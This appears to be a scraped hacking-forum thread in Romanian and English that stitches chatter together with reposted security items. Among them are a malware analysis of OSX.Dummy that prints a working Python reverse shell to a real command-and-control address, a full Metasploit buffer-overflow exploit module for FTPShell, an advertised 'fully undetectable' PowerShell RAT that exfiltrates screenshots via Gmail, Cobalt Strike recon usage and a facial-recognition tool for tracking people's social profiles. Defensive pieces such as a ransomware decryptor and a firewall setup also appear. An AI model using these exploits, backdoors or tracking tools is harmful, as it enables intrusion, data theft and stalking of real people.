Fi8sVrs

OCR PS: sa ne anunti cand iti deschizi cabinetul, am niste "amici" conectati prin bluetooth

Foto: Mihai Ciobanu Președintele României, Klaus Iohannis, a semnat vineri, 28 decembrie a.c., decretul pentru promulgarea Legii privind asigurarea unui nivel comun ridicat de securitate a rețelelor și sistemelor informatice (PL-x 280/02.05.2018). Președintele României, Klaus Iohannis, a semnat vineri, 28 decembrie a.c., decretul pentru promulgarea Legii privind asigurarea unui nivel comun ridicat de securitate a rețelelor și sistemelor informatice (PL-x 280/02.05.2018). Directiva NIS ( Network Internet Security) stabilește la nivel european un sistem unitar de prevenire și răspuns la incidentele de securitate informatică, având drept scop protejarea și stimularea dezvoltării Pieței Digitale Unice, prin crearea la nivelele naționale a mecanismelor adecvate. În context, obiectivele actului normativ promulgat astăzi sunt: *stabilirea cadrului de cooperare la nivel național și de participare la nivel european și internațional în domeniul asigurării securității rețelelor și sistemelor informatice, *crearea cadrului instituțional prin desemnarea Centrului Național de Răspuns la Incidente de Securitate Cibernetică – CERT-RO ca autoritate competentă, *desemnarea entităților de drept public și privat care dețin competențe și responsabilități în aplicarea prevederilor prezentei legi, *desemnarea punctului unic de contact la nivel național și a echipei naționale de răspuns la incidente de securitate informatică – Centrul Național de Răspuns la Incidente de Securitate Cibernetică (CERT-RO) *stabilirea cerințelor de securitate și notificare pentru operatorii de servicii esențiale și pentru furnizorii de servicii digitale și instituirea mecanismelor de actualizare a acestora în funcție de evoluția amenințărilor la adresa securității rețelelor și sistemelor informatice Mecanisme de cooperare în caz de necesitate Astfel, se instituie mecanisme de cooperare în caz de necesitate între (CERT-RO )și autoritățile competente pe sectoarele și subsectoarele de activitate în cadrul cărora își desfășoară activitatea operatorii de servicii esențiale, în vederea preîntâmpinării situațiilor în care incidente de securitate informatică inițial minore, care afectează un furnizor de servicii digitale, să evolueze rapid și să afecteze infrastructuri critice naționale sau europene. Sectoarele și subsectoarele de activitate în cadrul cărora își desfășoară activitatea operatorii de servicii esențiale, sunt: energie, transporturi, bancar, infrastructuri ale pieței financiare, sănătate, furnizare și distribuire de apă potabilă și infrastructură digitală, legea instituind obligații de asigurare a securității și de notificare a incidentelor și furnizorilor de servicii digitale precum: cloud computing, piețe online, motoare de căutare. Via: https://www.dcnews.ro/securitate-informatica--noi-reglementari-intrate-in-vigoare_630191.html

Erau de asteptat

Salut, vand domeniu din 3 litere, pretul este discutabil, astept ofertele in pm Pr: up

Languages (th) dude :))))

Bang..

Ia stai stai un pic.. Du-te ba ca 4usul acela si-a trimis mail singur

Maximum Payout: Yahoo can pay $15000 for detecting important bugs in their system.

Nu am primit tweet //Sunt pe tel, nu reusesc sa repar unitatea

SharpFruit SharpFruit is a c# port of Find-Fruit.ps1 SharpFruit is intended to aid Penetration Testers in finding juicy targets on internal networks without nmap scanning. As an example, one could execute SharpFruit.exe through Cobalt Strike's Beacon "execute-assembly" module. Example usage beacon>execute-assembly /root/SharpFruit/SharpFruit.exe --cidr 10.10.1.0/24 --port 8080 OR an example using SSL beacon>execute-assembly /root/SharpFruit/SharpFruit.exe --cidr 10.10.1.0/24 --port 9443 --ssl+ --useragent "GoogleBotIsInsideYourNetwork" Source: https://github.com/rvrsh3ll/SharpFruit.git

:)))))) cunilingus bre

Unde bre, cacatul asta de radioirc l-a deschis Posted September 17

Da, eu.

@fbob

Ei vor cornulete, cookies

De ce? Cand aveti KRACK WPA3

auzi ce zpune tiganul

Aici

Early today, Remco Verhoef (@remco_verhoef) posted an interesting entry to SANS 'InfoSec Handlers Diary Blog'. Titled "Crypto community target of MacOS malware" he noted: His great writeup notes the initial infection vector and provides an overview of the malware, including its method of persistence (launch daemon) and purpose (reverse shell). Here, we dive in a touch deeper into the malware and illustrate how Objective-See's tools can generically thwart this new threat, at every step of the way! OSX.Dummy Remco Verhoef states the malware attacks are: Apparently attackers are asking users to infect themselves, via the following command: $ cd /tmp && curl -s curl $MALICIOUS_URL > script && chmod +x script && ./script If users fall for this (rather lame social engineering trick, a rather massive machO binary will be downloaded and executed. Massive you say? Yes, it clocks in at 34M: $ du -h /tmp/script 34M script Using WhatsYourSign, we can see that the malicious binary is not signed: Normally such a binary would be blocked by GateKeeper. However if users are downloading and running a binary directly via terminal commands, GateKeeper does not come into play and thus unsigned binary will be allowed to execute. Does this count as a GateKeeper bypass? Maybe? ...I guess the take away here is (yet again) the builtin macOS malware mitigations should never be viewed as a panacea. Unfortunately this binary remains 100% undetected (0/60) all AV engines on VirusTotal: Moving on, if we open the binary in Hopper, the reason for it's size is clear. Various libraries such as OpenSSL and V8 appear to be statically compiled in: Since it's a) Friday PM and b) this binary is massive, filled with all sorts of library code, we're going to skip static analysis and hop right into dynamic analysis. In a High Sierra virtual machine (vm) with various Objective-See tools installed, we execute the malware in order to dynamically observe its actions. Via the ProcInfo process monitor, it's easy to passively see exactly that malware is up to! First, the malware sets script to be owned as root: # procInfo monitoring for process events... process start: pid: 432 path: /usr/bin/sudo args: ( "/usr/bin/sudo", "-S", "-p", "#node-sudo-passwd#", chown, root, "/tmp/script.sh" ) As the malware executes sudo to change the file's permissions to root, this will require the user enter their password in the terminal. This is saved by the malware to /tmp/dumpdummy: # sudo fs_usage -w -f filesystem open /tmp/dumpdummy script.5354 pwrite F=19 script.5354 close F=19 script.5354 # cat /tmp/dumpdummy hunter2 The malware then sets the script to be executable via chmod +x: # procInfo monitoring for process events... process start: path: /usr/bin/sudo user: 501 args: ( "/usr/bin/sudo", "-S", "-p", "#node-sudo-passwd#", chmod, "+x", "/tmp/script.sh" ) Following this, the malware continues by: moving the script into /var/root mv "/tmp/script.sh" "/var/root/" dumping a plist file to /tmp/com.startup.plist and then moving into the LaunchDaemons directory mv "/tmp/com.startup.plist" "/Library/LaunchDaemons/ setting the owner of the com.startup.plist plist to root chown root "/Library/LaunchDaemons/com.startup.plist" launching the com.startup.plist launch daemon launchctl load "-w" "/Library/LaunchDaemons/com.startup.plist" At this point the malware has persisted a malicious launch daemon. This is kindly noted by BlockBlock which detects and alerts on this persistence attempt: As noted in the BlocKBlock alert, the path to the launch daemon plist is /Library/LaunchDaemons/com.startup.plist. <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> <plist version="1.0"> <dict> <key>KeepAlive</key> <true/> <key>Label</key> <string>com.startup</string> <key>Program</key> <string>/var/root/script.sh</string> <key>RunAtLoad</key> <true/> </dict> </plist> As the RunAtLoad key is set to true the value of the Program key, /var/root/script.sh, will be automatically executed by the OS whenever the system is rebooted. Let's look at the script.sh file: #!/bin/bash while : do python -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("185.243.115.230",1337)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);' sleep 5 done Ah a python script! As noted by Remco Verhoef (@remco_verhoef) in his writeup, this will attempt to connect to 185.243.115.230 on port 1337. It then duplicates stdin, stdout and stderr to the socket, before executing /bin/sh with the -i flag. In other words, it's setting up an interactive reverse shell. If you have a firewall product installed, such as Objective-See's LuLu, this network activity will be detected: If the connection to the attacker's C&C server (185.243.115.230:1337) succeeds, the attacker will be able to arbitrarily execute commands (as root!) on the infected system. Conclusion Today we analyzed a new piece of mac malware. I'm calling it OSX.Dummy as: the infection method is dumb the massive size of the binary is dumb the persistence mechanism is lame (and thus also dumb) the capabilities are rather limited (and thus rather dumb) it's trivial to detect at every step (that dumb) ...and finally, the malware saves the user's password to dumpdummy To check if you're infected run KnockKnock as root (since the malware set's it components to be readable only by root). Look for an unsigned launch item com.startup.plist executing something named 'script.sh': One can also look for an instance of python running running as root, with the aforementioned reverse shell commands: $ ps aux | grep -i python root python -c import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("185.243.115.230",1337)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]); Source: objective-see.com

macOS-Fortress macOS-Fortress: Firewall, Blackhole, and Privatizing Proxy for Trackers, Attackers, Malware, Adware, and Spammers Kernel-level, OS-level, and client-level security for macOS. Built to address a steady stream of attacks visible on snort and server logs, as well as blocks ads, malicious scripts, and conceal information used to track you around the web. After this package was installed, snort and other detections have fallen to a fraction with a few simple blocking actions. This setup is a lot more capable and effective than using a simple adblocking browser add-on. There's a world of difference between ad-filled web pages with and without a filtering proxy server. It's also saved me from inadvertantly clicking on phishing links. Proxy features macOS adaptive firewall Adaptive firewall to brute force attacks IP blocks updated about twice a day from emergingthreats.net (IP blocks, compromised hosts, Malvertisers) and dshield.org’s top-20 Host blocks updated about twice a day from hphosts.net EasyList Tracker and Adblock Rules to Proxy Auto Configuration (PAC) proxy.pac file and Privoxy Actions and Filters Uses easylist-pac-privoxy and adblock2privoxy to easily incorporate multiple blocking rulesets into both PAC and Privoxy formats, including easyprivacy.txt, easylist.txt, fanboy-annoyance.txt, fanboy-social.txt, antiadblockfilters.txt, malwaredomains_full.txt, and the anti-spamware list adblock-list.txt. The install script readme-and-install.sh installs and configures an macOS Firewall and Privatizing Proxy. It will: Prompt you to install Apple's Xcode Command Line Tools and Macports Uses Macports to download and install several key utilities and applications (wget gnupg p7zip squid privoxy nmap) Configure macOS's PF native firewall (man pfctl, man pf.conf), squid, and privoxy Turn on macOS's native Apache webserver to serve the Automatic proxy configuration http://localhost/proxy.pac Networking on the local computer can be set up to use this Automatic Proxy Configuration without breaking App Store or other updates (see squid.conf) Uncomment the nat directive in pf.conf if you wish to set up an OpenVPN server Install and launch daemons that download and regularly update open source IP and host blacklists. The sources are emergingthreats.net (net.emergingthreats.blockips.plist), dshield.org (net.dshield.block.plist), hosts-file.net (net.hphosts.hosts.plist), and EasyList (com.github.essandess.easylist-pac.plist, com.github.essandess.adblock2privoxy.plist) Installs a user launch daemon that deletes flash cookies not related to Adobe Flash Player settings every half-hour (http://goo.gl/k4BxuH) After installation the connection between clients and the internet looks this this: Application proxy.pac port 3128Squid port 8118Privoxy Internet An auxilliary nginx-based webserver (nominally on localhost:8119) is used for both a proxy.pac ad and tracker blackhole and for CSS element blocking rules with the Privoxy configuration generated by adblock2privoxy. Public Service Announcement This firewall is configured to block all known tracker and adware content—in the browser, in-app, wherever it finds them. Many websites now offer an additional way to block ads: subscribe to their content. Security and privacy will always necessitate ad blocking, but now that this software has become mainstream with mainstream effects, ad blocker users must consider the potential impact of ad blocking on the writers and publications that are important to them. Personally, two publications that I gladly pay for, especially for their important 2016 US Presidential election coverage, are the New York Times and The Atlantic. I encourage all users to subscribe to their own preferred publications and writers. Tracker blocking Lightbeam, the tracking tracker Firefox add-on, shows how ad- and tracker-blocking works to prevent third parties monitoring you or your children's online activities. My daughter enjoys the learning exercises at the children's website ABCya!. The Lightbeam graph below on the left shows all the third party trackers after less than a minute of browser activity, without using a privatizing proxy. The graph on the right shows all this tracker activity blocked when this privatizing proxy is used. Lightbeam graph without proxy Lightbeam graph with proxy This problem is the subject of Gary Kovacs's TED talk, Tracking Our Online Trackers: Attack blocking The snort intrusion detection system reports far fewer events when known attack sites are blackholed by the packet filter: snort+BASE Overview snort+BASE Events Installation git clone --recurse https://github.com/essandess/macOS-Fortress.git cd macOS-Fortress sudo sh ./readme-and-install.sh Disabling sudo sh ./disable.sh Notes Configure the squid proxy to accept connections on the LAN IP and set LAN device Automatic Proxy Configurations to http://lan_ip/proxy.pac to protect devices on the LAN. Count the number of attacks since boot with the script pf_attacks. ``Attack'' is defined as the number of blocked IPs in PF's bruteforce table plus the number of denied connections from blacklisted IPs in the tables compromised_ips, dshield_block_ip, and emerging_threats. Both squid and Privoxy are configured to forge the User-Agent. The default is an iPad to allow mobile device access. Change this to your local needs if necessary. Whitelist or blacklist specific domain names with the files /usr/local/etc/whitelist.txt and /usr/local/etc/blacklist.txt. After editing these file, use launchctl to unload and load the plist /Library/LaunchDaemons/net.hphosts.hosts.plist, which recreates the hostfile /etc/hosts-hphost and reconfigures the squid proxy to use the updates. Sometimes pf and privoxy do not launch at boot, in spite of the use of the use of their launch daemons. Fix this by hand after boot with the scripts macosfortress_boot_check, or individually using pf_restart, privoxy_restart, and squid_restart. And please post a solution if you find one. All open source updates are done using the wget -N option to save everyone's bandwidth Security These services are intended to be run on a secure LAN behind a router firewall. The default proxy configuration will only accept connections made from the local computer (localhost). If you change this to accept connections from any client on your LAN, do not configure the router to forward ports 3128 or 8118, or you will be running an open web proxy. Source

Security researchers at Microsoft have unveiled details of two critical and important zero-day vulnerabilities that had recently been discovered after someone uploaded a malicious PDF file to VirusTotal, and get patched before being used in the wild. In late March, researchers at ESET found a malicious PDF file on VirusTotal, which they shared with the security team at Microsoft "as a potential exploit for an unknown Windows kernel vulnerability." After analyzing the malicious PDF file, the Microsoft team found that the same file includes two different zero-day exploits—one for Adobe Acrobat and Reader, and the other targeting Microsoft Windows. Since the patches for both the vulnerabilities were released in the second week of May, Microsoft released details of both the vulnerabilities today, after giving users enough time to update their vulnerable operating systems and Adobe software. According to the researchers, the malicious PDF including both the zero-days exploit was in the early development stage, "given the fact that the PDF itself did not deliver a malicious payload and appeared to be proof-of-concept (PoC) code." It seems someone who could have combined both the zero-days to build an extremely powerful cyber weapon had unintentionally and mistakenly lost the game by uploading his/her under-development exploit to VirusTotal. The zero-day vulnerabilities in question are a remote code execution flaw in Adobe Acrobat and Reader (CVE-2018-4990) and a privilege escalation bug in Microsoft Windows (CVE-2018-8120). Leveraging shellcode execution from the first vulnerability, the attacker uses the second Windows kernel exploit to break the Adobe Reader sandbox and run it with elevated privileges. Since this malicious PDF sample was under development at the time of detection, it apparently included a simple PoC payload that dropped an empty vbs file in the Startup folder. Microsoft and Adobe have since released corresponding security updates for both the vulnerabilities in May. For more technical details of the exploits, you can head on to Microsoft and ESET blogs. Via thehackernews.com

███████╗ █████╗ ██████╗ ██╗ ███████╗ ███████╗██╗ ██╗███████╗ ██╔════╝██╔══██╗██╔════╝ ██║ ██╔════╝ ██╔════╝╚██╗ ██╔╝██╔════╝ █████╗ ███████║██║ ███╗██║ █████╗ █████╗ ╚████╔╝ █████╗ ██╔══╝ ██╔══██║██║ ██║██║ ██╔══╝ ██╔══╝ ╚██╔╝ ██╔══╝ ███████╗██║ ██║╚██████╔╝███████╗███████╗ ███████╗ ██║ ███████╗ ╚══════╝╚═╝ ╚═╝ ╚═════╝ ╚══════╝╚══════╝ ╚══════╝ ╚═╝ ╚══════╝ Jerry Shaw, you have been activated Find your friends Social Media Profiles with ease This only works if their Facebook Profile is public What does this do? In simple words you have at least one Image of the Person you are looking for and a clue about its name. You feed this program with it and it tries to find Instagram, Youtube, Facebook, Twitter Profiles of this Person. How does it work? You give it a name and at least one photo. It then searches Facebook for this name and does Facial Recognition to determine the right Facebook Profile. After that it does a Google and ImageRaider Reverse Image Search to find other Social Media Profiles. If a Instagram Profile was found it will be verified by comparing your known photo of the Person to some of the Instagram Pictures. In the end you get a PDF Report How to use it Automated Prequisites Installation wget https://raw.githubusercontent.com/ThoughtfulDev/EagleEye/master/pre.sh && chmod +x pre.sh && ./pre.sh Manual Prequisites Installation $ sudo apt update && sudo apt upgrade -y $ sudo apt install git python3 python3-pip python3-dev $ sudo apt install libgtk-3-dev libboost-all-dev build-essential cmake libffi-dev $ git clone https://github.com/ThoughtfulDev/EagleEye $ cd EagleEye && sudo pip3 install -r requirements.txt $ sudo pip3 install --upgrade beautifulsoup4 html5lib spry Regardless of which option you choose make sure that you have Firefox installed If you have Firefox installed, download the latest release of the Geckodriver for you Architecture. Note: If you are using Firefox ESR(like Kali does) please use the Geckodriver Version 17 Next change the value in config.json to the path of the geckodriver e.g { "DEFAULTS": { ... }, "WEBDRIVER": { "ENGINE": "firefox", "PATH": "PATH TO geckodriver e.g C:\\Program Files\\geckodriver.exe" }, "FILTER": [ .... ], ... } Make the Geckodriver executable $ chmod +x /path/to/geckodriver I will try to implement the Chrome Webdriver as soon as possible Next put at least one Image of the Person you want to find in the known folder. (Has to be .jpg for now) Then run the program $ python3 eagle-eye.py To see a list of all available Options just type $ python3 eagle-eye.py -h The ImageRaider Reverse Image Search can take some minutes 1-15 Minutes depending on the count of Images Screenshots? Example Report (Used one Image of Emeraude Toubia) Download: EagleEye-master.zip Source

Python based backdoor that uses Gmail to exfiltrate data through attachment. This RAT will help during red team engagements to backdoor any Windows machines. It tracks the user activity using screen capture and sends it to an attacker as an e-mail attachment. Powershell-RAT Python based backdoor that uses Gmail to exfiltrate data as an e-mail attachment. This RAT will help someone during red team engagements to backdoor any Windows machines. It tracks the user activity using screen capture and sends the information to an attacker as an e-mail attachment. Note: This piece of code is Fully UnDetectable (FUD) by Anti-Virus (AV) software. This project must not be used for illegal purposes or for hacking into system where you do not have permission, it is strictly for educational purposes and for people to experiment with. Any suggestions or ideas for this tool are welcome - just tweet me on @ManiarViral Screenshot: On the first run of the Powershell-RAT user will get options as below: Using Hail Mary option to backdoor a Windows machine: Successfully taking screenshots of the user activity: Data exfiltrated as an email attachment using Gmail: Setup: Throwaway Gmail email address Enable "Allow less secure apps" by going to https://myaccount.google.com/lesssecureapps Modify the $username & $password variable for your account in the Mail.ps1 Powershell file Modify $msg.From & $msg.To.Add with throwaway gmail address Download: Powershell-RAT-master.zip Source

This Metasploit module exploits a buffer overflow in the FTPShell client 6.70 (Enterprise edition) allowing remote code execution. ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::TcpServer def initialize(info = {}) super(update_info(info, 'Name' => 'FTPShell client 6.70 (Enterprise edition) Stack Buffer Overflow', 'Description' => %q{ This module exploits a buffer overflow in the FTPShell client 6.70 (Enterprise edition) allowing remote code execution. }, 'Author' => [ 'r4wd3r', # Original exploit author 'Daniel Teixeira' # MSF module author ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2018-7573'], [ 'EDB', '44596' ] ], 'Payload' => { 'Space' => 400, 'BadChars' => "\x00\x22\x0d\x0a\x0b" }, 'Platform' => 'win', 'Targets' => [ # CALL ESI in FTPShell.exe : 0x00452eed [ 'Windows Universal', {'Ret' => "\xed\x2e\x45" } ] ], 'Privileged' => false, 'DefaultOptions' => { 'SRVHOST' => '0.0.0.0', 'EXITFUNC' => 'thread' }, 'DisclosureDate' => 'Mar 4 2017', 'DefaultTarget' => 0)) register_options [ OptPort.new('SRVPORT', [ true, 'The FTP port to listen on', 21 ]) ] end def exploit srv_ip_for_client = datastore['SRVHOST'] if srv_ip_for_client == '0.0.0.0' if datastore['LHOST'] srv_ip_for_client = datastore['LHOST'] else srv_ip_for_client = Rex::Socket.source_address('50.50.50.50') end end srv_port = datastore['SRVPORT'] print_status("Please ask your target(s) to connect to #{srv_ip_for_client}:#{srv_port}") super end def on_client_connect(client) p = regenerate_payload(client) return if p.nil? print_status("#{client.peerhost} - connected.") res = client.get_once.to_s.strip print_status("#{client.peerhost} - Request: #{res}") unless res.empty? print_status("#{client.peerhost} - Response: Sending 220 Welcome") welcome = "220 Welcome.\r\n" client.put(welcome) res = client.get_once.to_s.strip print_status("#{client.peerhost} - Request: #{res}") print_status("#{client.peerhost} - Response: sending 331 OK") user = "331 OK.\r\n" client.put(user) res = client.get_once.to_s.strip print_status("#{client.peerhost} - Request: #{res}") print_status("#{client.peerhost} - Response: Sending 230 OK") pass = "230 OK.\r\n" client.put(pass) res = client.get_once.to_s.strip print_status("#{client.peerhost} - Request: #{res}") sploit = '220 "' sploit << payload.encoded sploit << "\x20" * (payload_space - payload.encoded.length) sploit << target.ret sploit << "\" is current directory\r\n" print_status("#{client.peerhost} - Request: Sending the malicious response") client.put(sploit) end end Source

ThanatosDecryptor is an executable program that attempts to decrypt certain files encrypted by the Thanatos malware. File types currently supported include: Image: .gif, .tif, .tiff, .jpg, .jpeg, .png Video: .mpg, .mpeg, .mp4, .avi Audio: .wav Document: .doc, .docx, .xls, .xlsx, .ppt, .pptx, .pdf, .odt, .ods, .odp, .rtf Other: .zip, .7z, .vmdk, .psd, .lnk In order to decrypt files as quickly as possible, ThanatosDecryptor should be run on the original machine infected with the malware, and against the original .THANATOS files that it created. ThanatosDecryptor has been tested against versions 1 and 1.1 of the malware. Known malware sample hashes include: 55aa55229ea26121048b8c5f63a8b6921f134d425fba1eabd754281ca6466b70 97d4145285c80d757229228d13897820d0dc79ab7aa3624f40310098c167ae7e 8df0cb230eeb16ffa70c984ece6b7445a5e2287a55d24e72796e63d96fc5d401 bad7b8d2086ac934c01d3d59af4d70450b0c08a24bc384ec61f40e25b7fbfeb5 02b9e3f24c84fdb8ab67985400056e436b18e5f946549ef534a364dff4a84085 fe1eafb8e31a84c14ad5638d5fd15ab18505efe4f1becaa36eb0c1d75cd1d5a9 Thanatos Overview When run, the Thanatos malware looks for files recursively in the following directories: Desktop Documents Downloads Favourites Music OneDrive Pictures Videos For each file found, the malware derives an encryption key from the number of milliseconds that the infected computer has been running (via a call to GetTickCount), encrypts the file using 256-bit AES encryption, and then discards the encryption key. It would be practically impossible to brute-force guess the 256-bit AES encryption key directly, but since the malware derives this key from the system uptime (a 32-bit value) the key is effectively 32-bits in length. On the virtual machine that I tested on, around 100,000 key derivations and AES decryption operations (on one AES block worth of data, needed for decryption success verification) could be performed every second, meaning in the worst case it would take around 12 hours to successfully guess the key if the system uptime value was random. The system uptime is not random, though. The maximum number of milliseconds you can store in a 32-bit value comes out to be 49.7 days worth, and many people tend to shutdown or hibernate their computers before then (or let them sleep from time to time). Thus, the system uptime at time of infection is likely to be a fairly low value - starting at 0 and guessing your way up is a decent approach. A further optimization is enabled by the fact that the system uptime is written to the Windows Event Logs around once per day. Also, the malware does not modify the .THANATOS file creation dates, so with this information the search space can be reduced to approx. the number of milliseconds within the 24 hours before infection. At 100k attempts per second, it would take around 14 minutes to guess the key under these conditions. ThanatosDecryptor Operation When run, ThanatosDecryptor first searches the directories listed above for files with the .THANATOS file extension. Once found, the original file extension (which is preserved by the malware in the file name write before .THANATOS) is compared with the list of file types supported by ThanatosDecryptor. If the file type is one supported, the file gets queued for decryption. ThanatosDecryptor also parses the Windows Event Log for the daily uptime messages and uses the encrypted file time metadata to determine a starting value for decryption. This value is used to derive an encryption key, an AES decryption operation is done against the file contents, and the resulting byte are compared against values known to be at the beginning of those file types. If the comparison is unsuccessful, increments the seed and tries this process again. Otherwise, the file is decrypted and written out with the original file name. Finally, once one file has been successfully encrypted, ThanatosDecryptor uses the SEED value from that decryption attempt as a starting point for decryption attempts against follow-on files (since they are all likely to be very similar). Running the Program Download the latest ThanatosDecryptor.exe file from the Release directory and run it on the infected system as the user that had his/her files encrypted. Building Visual Studios is required for building. Visual Studio 2017 Community Edition works for me! To build ThanatosDecryptor from source, clone this repo, cd into the ThanatosDecryptor directory, and from the 'Developer Command Prompt for VS 2017' that ships with Visual Studio 2017, run the following command: msbuild ThanatosDecryptor.vcxproj /p:Configuration=Release /p:Platform=Win32 It's easiest to find the Developer Command Prompt using the Windows Start Menu search box. Example output Found the following files able to be decrypted: C:\Users\zelda\Desktop\testfiles\test.7z.THANATOS C:\Users\zelda\Desktop\testfiles\Test.doc.THANATOS C:\Users\zelda\Desktop\testfiles\Test.docx.THANATOS C:\Users\zelda\Desktop\testfiles\test.gif.lnk.THANATOS [...] C:\Users\zelda\Desktop\testfiles\test.xlsx.THANATOS C:\Users\zelda\Desktop\testfiles\test.zip.THANATOS Beginning decryption attempt Attempting to decrypt C:\Users\zelda\Desktop\testfiles\test.7z.THANATOS Tried 393288 seed values thus far Successful decryption verification! Seed: 516031 Successfully wrote decrypted file to: C:\Users\zelda\Desktop\testfiles\test.7z Attempting to decrypt C:\Users\zelda\Desktop\testfiles\Test.doc.THANATOS Overriding calculated SEED value for previously successful SEED value (minus 60 secs): 516031 Tried 8257 seed values thus far Successful decryption verification! Seed: 516031 Successfully wrote decrypted file to: C:\Users\zelda\Desktop\testfiles\Test.doc Attempting to decrypt C:\Users\zelda\Desktop\testfiles\Test.docx.THANATOS Overriding calculated SEED value for previously successful SEED value (minus 60 secs): 516031 Tried 8257 seed values thus far Successful decryption verification! Seed: 516031 Successfully wrote decrypted file to: C:\Users\zelda\Desktop\testfiles\Test.docx Attempting to decrypt C:\Users\zelda\Desktop\testfiles\test.gif.lnk.THANATOS Overriding calculated SEED value for previously successful SEED value (minus 60 secs): 516031 Tried 8257 seed values thus far Successful decryption verification! Seed: 516046 Successfully wrote decrypted file to: C:\Users\zelda\Desktop\testfiles\test.gif.lnk Attempting to decrypt C:\Users\zelda\Desktop\testfiles\test.gif.THANATOS Overriding calculated SEED value for previously successful SEED value (minus 60 secs): 516046 [...] Attempting to decrypt C:\Users\zelda\Desktop\testfiles\test.xlsx.THANATOS Overriding calculated SEED value for previously successful SEED value (minus 60 secs): 516062 Tried 8226 seed values thus far Successful decryption verification! Seed: 8ca3e Successfully wrote decrypted file to: C:\Users\zelda\Desktop\testfiles\test.xlsx Attempting to decrypt C:\Users\zelda\Desktop\testfiles\test.zip.THANATOS Overriding calculated SEED value for previously successful SEED value (minus 60 secs): 516062 Tried 8226 seed values thus far Successful decryption verification! Seed: 8ca3e Successfully wrote decrypted file to: C:\Users\zelda\Desktop\testfiles\test.zip Press any key to exit Note how some files were encrypted using the same Seed value - according to the GetTickCount man page, the uptime has a resolution of between 10ms and 16ms, which means that it can take between 10-16 ms for another call to GetTickCount to return a different value. Download: ThanatosDecryptor-master.zip (1.8MB) Source